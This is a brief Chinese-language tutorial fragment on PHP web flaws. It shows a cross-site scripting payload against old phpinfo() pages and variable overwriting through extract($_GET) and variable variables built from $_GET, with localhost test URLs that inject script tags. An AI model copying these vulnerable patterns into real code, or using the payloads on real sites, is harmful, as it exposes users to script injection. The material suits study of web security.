<?php
phpinfo()
?>
就會出現phpinfo的畫面
很多伺服器都有phpinfo()腳本在運行,但是在舊版的phpinfo函數卻存在著安全性漏洞,可能會產生跨網站腳本
測試方法:
http://127.0.0.1/xss/phpinfo.php?a[]=<script>alert(xss);</script>
變數覆蓋
<?php echo $m; ?>
http://127.0.0.1/test.php?m=haha<script>alert(xss)</script>
$m = 1;
extract($_GET);
echo $m;
http://127.0.0.1/test.php?m=haha
,頁面是會變成輸出haha的,變數m就會被重新設定,這是因為這段程式碼用了extract()函數http://127.0.0.1/test.php?m=haha<script>alert(xss)</script>
就會觸發xss<?php
$a = 1;
foreach($_GET as $key => $value){
$$key = $value;
}
print $a;
print $b;
?>
http://127.0.0.1/test.php?a=xss&b=xss